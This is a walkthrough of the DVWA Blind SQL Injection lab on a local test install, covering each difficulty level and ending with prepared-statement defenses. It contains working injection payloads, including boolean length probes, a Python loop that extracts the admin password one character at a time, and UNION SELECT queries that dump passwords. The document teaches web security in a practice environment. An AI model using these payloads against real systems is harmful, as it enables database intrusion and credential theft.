SQLi Blind --

http://localhost/DVWA/vulnerabilities/sqli_blind/

What is a SQL Injection Blind?

Blind SQL injection occurs when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors.

Many techniques such as UNION attacks are not effective with blind SQL injection vulnerabilities. This is because they rely on being able to see the results of the injected query within the application's responses. It is still possible to exploit blind SQL injection to access unauthorized data, but different techniques must be used.

Using BurpSuite and the FoxyProxy extension is recommended.

Low

We've an input type text that received an User ID in I by user and submit request using the Submit button:

In SQL Blind we obtain a boolean result (exist or not exist) of our query, then we need to be able to ask correctly information from DB, make script can be the best approach.

This's our request captured by Burp Suite, while here below there's a php source code:

How the same in the low level, there're not input sanitation, then we can send what we want into input type text field. In this case request will arrive to DB located into webserver, but query will be preparared using php language.

Analyzing source code, we know that mysql query is:

SELECT first_name, last_name FROM users WHERE user_id = '$id';

1st Payload (length)

Regarding query and that our input type value is insert into $id variable, we need to do multiple question to DB regarding password length.

Then in this case, we can use following payload: 1' AND (select 'x' from users where first_name='admin' and LENGTH(password) > 31)='x' # 

SELECT first_name, last_name FROM users WHERE user_id = '1' AND (select 'x' from users where first_name='admin' and LENGTH(password) > 30)='x' #';

admin password length is > 31?

User ID exists in the DB = true.

We need to continue to ask questions for obtain a correct value.

admin password length is > 32?

No! Answer is wrong, then regarding last two answer, we know that admin password length has 32 characters.

Of course we can use an automated python script to do this automatically:

2nd Payload (value)

starting with the first character, up to the last (which we know from the length we have just obtained) we must repeatedly query the DB asking whether or not the password character of the i-th position includes one of the possible alphanumeric characters.

for i in range(1, password_length+1):
    for c in ALPHABET:
        sql_payload = f"1' AND (select substring(password, {i}, 1) from users where first_name='{username}')='{c}' #"
        if sql2bool(sql_payload):
            password += c
            print(c, end="", flush=True) # to print in a cool way
            break

Then, our query will be:

1' AND (select substring(password, 1, 1) from users where first_name='admin')='5' # 

SELECT first_name, last_name FROM users WHERE user_id = '1' AND (select substring(password, 1, 1) from users where first_name='admin')='5' #';

Is the first character of admin password equals to 'a'?

No! again, is the first character of admin password equals to '5'?

Very good, the first character is 5, then we can continue to increment index and redo all questions until the final string will be discovered.

The input is not sanitized, so I can execute any (potentially malicious) command.

Medium

Here, there're a select with range (1 to 5) to set User ID.

In addition to low level, in the code below there're an escape string control and query variable $ID isn't enclosed by ''.

Our request include an ID + Submit values.

But, we can modify ID value using Burp Suite repeater function:

1st Payload

Remembering that $ID variable isn't enclosed by '', escape string control isn't a matter.

Then in this case, we can use following payload: 1 OR 1=1 -- 

SELECT first_name, last_name FROM users WHERE user_id = 1 OR 1=1 -- ;

in the where condition there're a first search to user with this id '' OR a true condition, plus a comment.

2nd Payload

How the low level, regarding that query selects: first_name, last_name field from users table, we can use UNION operator to add a new query: 1 UNION select first_name,password from users -- 

SELECT first_name, last_name FROM users WHERE user_id = 1 UNION SELECT first_name,password FROM users -- ';

Note: Every SELECT statement within UNION must have the same number of columns.

The input is not sanitized, so I can execute any (potentially malicious) command.

High

In this level clicking on first page, we obtain a redirect to a second page to submit effectively our Session ID:

1st Payload

In this case payload is always the same of low level, but we need to add it into second page, infact we've two request (GET and POST)

However, we can use following payload: 1' OR 1=1 -- 

SELECT first_name, last_name FROM users WHERE user_id = '1' OR 1=1 -- ';

that permit us to see all DB results:

2nd Payload

How last levels, we can use UNION operator to add a new query: ' UNION select first_name,password from users -- 

SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT first_name,password FROM users -- ';

Note: Every SELECT statement within UNION must have the same number of columns.

The input is not sanitized, so I can execute any (potentially malicious) command.

Impossible

The best solution is to sanitize query using a prepared statement, to delineate part static and dinamic (id) of query; take a binding parameter to check if is it an integer or char; insert a control to count rows number as result; and use a CSRF token.

All this permits to separate sql code with sql data/parameter insert by user.

References

For the making of this solution the following resource were used:

PreviousSQL InjectionNextVulnhub

Last updated